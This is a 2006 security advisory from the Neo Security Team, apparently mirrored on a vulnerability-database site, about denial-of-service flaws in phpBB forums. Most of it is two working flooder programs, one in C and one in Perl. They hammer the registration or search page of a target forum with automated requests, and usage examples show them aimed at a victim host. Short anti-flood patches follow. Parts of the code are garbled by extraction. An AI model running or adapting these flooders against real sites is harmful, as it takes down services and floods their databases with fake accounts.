Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11695
HistoryMar 05, 2006 - 12:00 a.m.

phpBB <= 2.0.19 Multiple DoS vulnerabilities

2006-03-0500:00:00
vulners.com
35

/*

[N]eo [S]ecurity [T]eam [NST]® - Advisory #18 - 03/03/06

Program: phpBB
Homepage: http://www.phpbb.com
Vulnerable Versions: All phpBB versions
Risk: High Risk!!
Impact: Multiple DoS Vulnerabilities.

-==phpBB Multiple DoS Vulnerabilities ==-

  • Description

phpBB is a high powered, fully scalable, and highly customizable
Open Source bulletin board package. phpBB has a user-friendly
interface, simple and straightforward administration panel, and
helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
phpBB is the ideal free community solution for all web sites.

  • Tested

many forums

  • Explotation

profile.php << By registering as many users as you can. The registration has to ve deactived the security
code image.
search.php << by searching in a way that the db couln't observe it.

This vulnerability has discovered in the version 2.0.15 but it works in all versions if the security image
code is not activ
ated. The exploits used were published some months ago, you can check it out in www.neosecurityteam.net

  • Exploit

[C Source]
/*
Name: NsT-phpBBDoS
Copyright: NeoSecurityteam
Author: HaCkZaTaN
Date: 19/06/05
Description: xD You must figure out the problem xD

root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c
root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS
root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS
[+] NsT-phpBBDoS v0.1 by HaCkZaTaN
[+] NeoSecurityTeam
[+] Dos has begun…[+]

[] Use: ./NsT-phpBBDoS
[
] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com
root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com
[+] NsT-phpBBDoS v0.1 by HaCkZaTaN [+]
[+] NeoSecurityTeam [+]
[+] Dos has begun…[+]


root@NeoSecurity:/home/hackzatan# echo "Let see how many users I have created"
Let see how many users I have created
root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE
MACHTYPE=i486-slackware-linux-gnu
root@NeoSecurity:/home/hackzatan#

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#ifdef WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#pragma pack(1)
#define WIN32_LEAN_AND_MEAN
#else
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif

#define __USE_GNU
#define _XOPEN_SOURCE

int Connection(char *, int);
void Write_In(int , char *, char *, char *, int);
char Use(char *);

int main(int argc, char *argv[])
{
int sock, x = 0;
char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3];

puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN [+]");
puts("[+] NeoSecurityTeam [+]");
puts("[+] Dos has begun…[+]
");
fflush(stdout);

if(argc != 4) Use(argv[0]);

while(1)
{
sock = Connection(Host,80);
Write_In(sock, Path, Pro_Sea, Host, x);
#ifndef WIN32
shutdown(sock, SHUT_WR);
close(sock);
#else
closesocket(sock);
WSACleanup();
#endif
Pro_Sea = argv[2];
x++;
}
//I don't think that it will get here =)

return 0;
}

int Connection(char *Host, int Port)
{
#ifndef WIN32
#define SOCKET int
#else
int error;
WSADATA wsadata;
error = WSAStartup(MAKEWORD(2, 2), &wsadata);

if (error == SOCKET_ERROR)
{
perror("Could Not Start Up Winsock!
");
return;
}

#endif

SOCKET sockfd;
struct sockaddr_in sin;
struct in_addr *myaddr;
struct hostent *h;

if(Port <= 0 || Port > 65535)
{
puts("[-] Invalid Port Number
");
fflush(stdout);
exit(-1);
}

if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
perror("socket() ");
fflush (stdout);
exit(-1);
}

if(isalpha(Host[0]))
{
if((h = gethostbyname(Host)) == NULL)
{
perror("gethostbyname() ");
fflush (stdout);
exit(-1);
}
}
else
{
myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
myaddr->s_addr=inet_addr(Host);

if((h = gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)) != NULL)
{
perror("gethostbyaddr() ");
fflush (stdout);
exit(-1);
}
}

memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(Port);
memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length);

if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0)
{
perror("connect() ");
exit (-1);
}

return sockfd;
}

void Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x)
{
char *str1 = (char )malloc(4BUFSIZ), *str2 = (char )malloc(4BUFSIZ);
char NsT[] = "x4Ex65x6Fx53x65x63x75x72x69x74x79x54x65x61x6D";
char req0 = "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
"
"Accept: /
"
"Accept-Language: en-us
"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,
;q=0.7
"
"Accept encoding: gzip,deflate
"
"Keep-Alive: 300
"
"Proxy-Connection: keep-alive
"
"Content-Type: application/x-www-form-urlencoded
"
"Cache-Control: no-cache
"
"Pragma: no-cache
";
char *Profile =
".net&new_password=0123456&password_confirm=0123456&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=spanish&style=4&timezone=1&dateformat=l%2C+d+F+Y%2C+H%3Ai&mode=register&agreed=true&coppa=0&submit=Enviar
";
char Search =
"&search_terms=any&search_author=
&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200
";

if(strcmp("profile.php", Pro_Sea) == 0) sprintf(str1, "username=N1sT__%d&email=N1sT__%d%%40%s%s", x, x,
NsT, Profile);
else if(strcmp("search.php", Pro_Sea) == 0)
{
Pro_Sea = "search.php?mode=results";
sprintf(str1, "search_keywords=Nst_%d%s", x, Search);
}
else
{
puts("Sorry. Try making the right choice");
exit(-1);
}

sprintf(str2, "POST %s%s HTTP/1.1
"
"Host: %s
"
"Referer: http://%s/
%s"
"Content-Length: %d

%s", Path, Pro_Sea, Host, Host, req0, strlen(str1), str1);

write(sock, str2, strlen(str2));
write(1, ".", 1);
fflush(stdout);
}

char Use(char program)
{
fprintf(stderr,"[
] Use: %s
", program);
fprintf(stderr,"[*] Example: %s /phpBB/ profile.php Victimshost.com
", program);
fflush(stdout);
exit(-1);
}

/*

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@

*/

/* EOF */


[Perl Source]
#!/usr/bin/perl

Name: NsT-phpBBDoS (Perl Version)

Copyright: Neo Security Team

Author: HaCkZaTaN

Ported: g30rg3_x

Date: 20/06/05

Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x

A Simple phpBB Registration And Search DoS Flooder.

g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl

[+]

[+] NsT-phpBBDoS v0.2 by HaCkZaTaN

[+] ported to Perl By g30rg3_x

[+] Neo Security Team

[+]

[+] Host |without http://www.| victimshost.com

[+] Path |example. /phpBB2/ or /| /phpBB2/

[+] Flood Type |1=Registration 2=Search| 1

[+] …

[+] …

[+] …

[+] …

[+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed

g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have created"

use IO::Socket;

Initialized X

$x = 0;

Flood Variables Provided By User

print q(
NsT-phpBBDoS v0.2 by HaCkZaTaN
ported to Perl By g30rg3_x
Neo Security Team

);
print q(Host |without http://www.| );
$host = ;
chop ($host);

print q(Path |example. /phpBB2/ or /| );
$pth = ;
chop ($pth);

print q(Flood Type |1 = Registration, 2 = Search| );
$type = ;
chop ($type);

If Type Is Equals To 1 or Registration

if($type == 1){

User Loop for 9999 loops (enough for Flood xDDDD)

while($x != 9999)
{

Building User in base X

$uname = "username=NsT__" . "$x";

Building User Mail in base X

$umail = "&email=NsT__" . "$x";

Final String to Send

$postit =
"$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";

Posit Length

$lrg = length $postit;

Connect Socket with Variables Provided By User

my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "
The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!
" unless $sock;

Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums

print $sock "POST $pth"."profile.php HTTP/1.1
";
print $sock "Host: $host
";
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
";
print $sock "Referer: $host
";
print $sock "Accept-Language: en-us
";
print $sock "Content-Type: application/x-www-form-urlencoded
";
print $sock "Accept-Encoding: gzip, deflate
";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
";
print $sock "Connection: Keep-Alive
";
print $sock "Cache-Control: no-cache
";
print $sock "Content-Length: $lrg

";
print $sock "$postit
";
close($sock);

Print a "." for every loop

syswrite STDOUT, ".";

Increment X in One for every Loop

$x++;
}

If Type Is Equals To 2 or Search

}
elsif ($type == 2){

User Search Loop for 9999 loops (enough for Flood xDDDD)

while($x != 9999)
{

Final Search String to Send

$postit =
"search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";

Posit Length

$lrg = length $postit;

Connect Socket with Variables Provided By User

my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "
The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!
" unless $sock;

Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums

print $sock "POST $pth"."search.php?mode=results HTTP/1.1
";
print $sock "Host: $host
";
print $sock "Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5
";
print $sock "Referer: $host
";
print $sock "Accept-Language: en-us
";
print $sock "Content-Type: application/x-www-form-urlencoded
";
print $sock "Accept-Encoding: gzip, deflate
";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
";
print $sock "Connection: Keep-Alive
";
print $sock "Cache-Control: no-cache
";
print $sock "Content-Length: $lrg

";
print $sock "$postit
";
close($sock);

Print a "." for every loop

syswrite STDOUT, ".";

Increment X in One for every Loop

$x++;
}
}else{

STF??? What Do You Type

die "Option not Allowed O_o???
";
}

  • Solutions

/* Patch by Paisterist. Put this code after the "// Get current date" line */
phpBB2/includes/usercp_register.php
-usercp_register.php-

$flood=time()-120;
$query=$db->sql_query("Select user_regdate from " . USERS_TABLE . " where user_regdate>='" . $flood . "'
order by user_regdate desc");
if($db->sql_numrows($query)!=0)
{
$row=$db->sql_fetchrow($query);
$error=TRUE;
$error_msg="Protecciуn anti flood activada. Por favor espera " . $flood - $row['user_regdate'] . " segundos
y manda los datos de vuelta.";
}
else
{
-usercp_register.php-

===================================
/* Patch by Paisterist. Put this code after "// Define initial vars" */
phpBB2/search.php
-search.php-
if ($_GET['mode']=="results")
{
############
$fp=fopen("time.txt", "r");
$flood=fgets($fp, 1000);
if($flood>=time()-5)
{
message_die(GENERAL_MESSAGE, "Protecciуn anti flood activada. Intenta unos segundos mбs tarde");
fclose($fp);
exit(0);
}
else
{
$fp=fopen("time.txt", "w");
fwrite($fp, time());
fclose($fp);
}

-search.php-

  • References

http://www.neosecurityteam.net/index.php?action=advisories&amp;id=18

  • Credits

[C Exploit] by HaCkZaTaN
[Perl Exploit] by g30rg3_x
[Patch] by Paisterist

[N]eo [S]ecurity [T]eam [NST]® - http://www.neosecurityteam.net/

Got Questions? http://www.neosecurityteam.net/foro/

irc.fullnetwork.org #nst [NeoSecurity IRC]

  • Greets

Daemon21
LINUX
erg0t
uyx
CrashCool
Makoki
KingMetal
r3v3ng4ns
T0wn3r
All Internal Fear Staff

Argentina, Mexico, Colombia, Chile, Uruguay EXISTS!!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/

/* EOF */